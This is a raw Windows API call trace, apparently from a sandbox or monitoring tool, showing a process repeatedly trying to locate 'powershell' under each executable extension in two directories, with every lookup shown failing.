	[0890.821] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0890.832] SetErrorMode (uMode=0x1) returned 0x1
	[0890.834] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0890.834] SetErrorMode (uMode=0x1) returned 0x1
	[0890.834] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0890.842] SetErrorMode (uMode=0x1) returned 0x1
	[0891.251] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0891.254] SetErrorMode (uMode=0x1) returned 0x1
	[0891.254] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0891.278] SetErrorMode (uMode=0x1) returned 0x1
	[0891.300] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0891.300] SetErrorMode (uMode=0x1) returned 0x1
	[0891.300] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0891.308] SetErrorMode (uMode=0x1) returned 0x1
	[0897.096] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0897.096] SetErrorMode (uMode=0x1) returned 0x1
	[0897.096] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0897.110] SetErrorMode (uMode=0x1) returned 0x1
	[0897.114] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0897.114] SetErrorMode (uMode=0x1) returned 0x1
	[0897.114] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0897.122] SetErrorMode (uMode=0x1) returned 0x1
	[0897.124] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0897.124] SetErrorMode (uMode=0x1) returned 0x1
	[0897.124] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0897.647] SetErrorMode (uMode=0x1) returned 0x1
	[0897.649] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0897.649] SetErrorMode (uMode=0x1) returned 0x1
	[0897.649] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0897.657] SetErrorMode (uMode=0x1) returned 0x1
	[0897.659] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0897.659] SetErrorMode (uMode=0x1) returned 0x1
	[0897.659] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0897.667] SetErrorMode (uMode=0x1) returned 0x1
	[0897.668] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0897.668] SetErrorMode (uMode=0x1) returned 0x1
	[0897.669] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0897.677] SetErrorMode (uMode=0x1) returned 0x1
	[0897.679] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0897.679] SetErrorMode (uMode=0x1) returned 0x1
	[0897.679] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0898.475] SetErrorMode (uMode=0x1) returned 0x1
	[0898.477] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0898.477] SetErrorMode (uMode=0x1) returned 0x1
	[0898.477] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0898.488] SetErrorMode (uMode=0x1) returned 0x1
	[0898.489] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0898.490] SetErrorMode (uMode=0x1) returned 0x1
	[0898.490] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0898.498] SetErrorMode (uMode=0x1) returned 0x1
	[0898.499] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0898.499] SetErrorMode (uMode=0x1) returned 0x1
	[0898.499] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0898.509] SetErrorMode (uMode=0x1) returned 0x1
	[0898.510] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0898.511] SetErrorMode (uMode=0x1) returned 0x1
	[0898.511] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.201] SetErrorMode (uMode=0x1) returned 0x1
	[0899.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.202] SetErrorMode (uMode=0x1) returned 0x1
	[0899.202] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.203] SetErrorMode (uMode=0x1) returned 0x1
	[0899.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.203] SetErrorMode (uMode=0x1) returned 0x1
	[0899.203] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.204] SetErrorMode (uMode=0x1) returned 0x1
	[0899.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.204] SetErrorMode (uMode=0x1) returned 0x1
	[0899.204] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.204] SetErrorMode (uMode=0x1) returned 0x1
	[0899.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.205] SetErrorMode (uMode=0x1) returned 0x1
	[0899.205] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.205] SetErrorMode (uMode=0x1) returned 0x1
	[0899.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.205] SetErrorMode (uMode=0x1) returned 0x1
	[0899.205] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.206] SetErrorMode (uMode=0x1) returned 0x1
	[0899.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.206] SetErrorMode (uMode=0x1) returned 0x1
	[0899.206] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.206] SetErrorMode (uMode=0x1) returned 0x1
	[0899.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.207] SetErrorMode (uMode=0x1) returned 0x1
	[0899.207] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.207] SetErrorMode (uMode=0x1) returned 0x1
	[0899.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.207] SetErrorMode (uMode=0x1) returned 0x1
	[0899.207] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.208] SetErrorMode (uMode=0x1) returned 0x1
	[0899.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.208] SetErrorMode (uMode=0x1) returned 0x1
	[0899.208] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.208] SetErrorMode (uMode=0x1) returned 0x1
	[0899.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.209] SetErrorMode (uMode=0x1) returned 0x1
	[0899.209] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.209] SetErrorMode (uMode=0x1) returned 0x1
	[0899.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.209] SetErrorMode (uMode=0x1) returned 0x1
	[0899.210] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.210] SetErrorMode (uMode=0x1) returned 0x1
	[0899.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.210] SetErrorMode (uMode=0x1) returned 0x1
	[0899.210] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.211] SetErrorMode (uMode=0x1) returned 0x1
	[0899.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.211] SetErrorMode (uMode=0x1) returned 0x1
	[0899.211] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.211] SetErrorMode (uMode=0x1) returned 0x1
	[0899.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.212] SetErrorMode (uMode=0x1) returned 0x1
